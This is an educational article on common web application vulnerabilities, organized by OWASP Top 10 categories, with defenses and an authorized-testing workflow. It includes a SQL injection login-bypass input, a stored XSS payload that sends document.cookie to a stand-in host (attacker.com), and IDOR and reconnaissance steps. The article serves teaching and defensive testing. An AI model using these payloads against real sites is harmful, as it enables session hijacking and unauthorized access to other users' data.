The OWASP Top 10 is updated every few years and reflects what’s consistently showing up in real-world assessments and breaches. The headlines cycle through novel attack techniques, but the vulnerabilities that actually compromise organizations are disproportionately the same classes of problems they were twenty years ago. Understanding these is the foundation for both building more secure applications and testing them.
Injection
SQL injection, command injection, LDAP injection — the common thread is that user-supplied input is interpreted as code by a backend system. Classic SQL injection:
-- Vulnerable query
"SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'"
-- Malicious input
username: ' OR '1'='1
-- Resulting query authenticates anyone
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = 'anything'
The defense is parameterized queries everywhere without exception. No string concatenation for SQL. No passing user input to shell commands. Parameterized queries prevent the input from being interpreted as SQL because the driver handles escaping at the protocol level.
SQLMap automates SQL injection discovery and exploitation and is the standard tool for assessing injection surface in authorized testing.
Broken Authentication
Authentication failures range from weak session tokens that can be guessed to improper credential handling (logging passwords, storing them without salting) to missing brute-force protection. Common findings:
- Tokens with insufficient entropy that can be predicted or brute-forced
- Sessions that don’t expire
- Credentials transmitted over unencrypted connections
- Password reset flows with exploitable logic flaws
- No rate limiting on authentication endpoints
Testing focuses on session token analysis, authentication bypass attempts, and reviewing how credentials are handled in transit and at rest.
Sensitive Data Exposure
Applications frequently expose data they shouldn’t. This includes: unencrypted databases and backups, debug endpoints left accessible in production, verbose error messages that reveal stack traces and internal paths, and API responses that return fields the client doesn’t need but an attacker finds useful.
Error message exposure is particularly useful for reconnaissanance — it reveals technology stacks, internal file paths, and often details about the application’s data model.
Insecure Direct Object References (IDOR)
One of the most common and highest-impact findings in bug bounty programs. The application uses a user-controlled identifier to access a resource without verifying that the requesting user should have access to that specific resource.
# Request
GET /api/invoices/47382
# What happens: invoice 47382 is returned
# What should happen: verify that the authenticated user owns invoice 47382
# What often happens: no check
Testing: identify any place where the application uses an ID, account number, or reference to retrieve a specific object. Modify the value and see if you can access data belonging to another user. Horizontal privilege escalation via IDOR is trivially easy to find and exploit and surprisingly common even in mature applications.
Cross-Site Scripting (XSS)
User input reflected back to the browser without proper encoding gets executed as JavaScript. Stored XSS (persisted in the database and rendered to other users) is higher impact than reflected (requires the victim to click a crafted link).
// Stored XSS in a comment field
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
Testing for XSS: inject payloads wherever user input is reflected. Simple probes like or "> identify injection points without requiring a complex payload. Burp Suite’s scanner automates basic XSS discovery.
Security Misconfiguration
The broadest category. Includes: default credentials left in place, unnecessary services exposed, overly permissive CORS headers, verbose server headers leaking software versions, S3 buckets left public, debug mode left on in production.
Assessment: nmap -sV for version exposure; check HTTP headers (Server, X-Powered-By) for software disclosure; test common default credentials; enumerate cloud storage with tools like aws s3 ls for misconfigured buckets.
The Testing Workflow
A structured web application assessment works through each OWASP category systematically using a combination of automated scanning (Burp Suite Pro scanner or OWASP ZAP) and manual testing focused on the highest-impact findings. Automated tools catch the obvious; manual testing finds the logic flaws and IDORs that scanners miss.
The proxy (Burp Suite is the standard) sits between the browser and the application, recording every request and response. This gives you a complete view of the attack surface and the ability to replay and modify any request.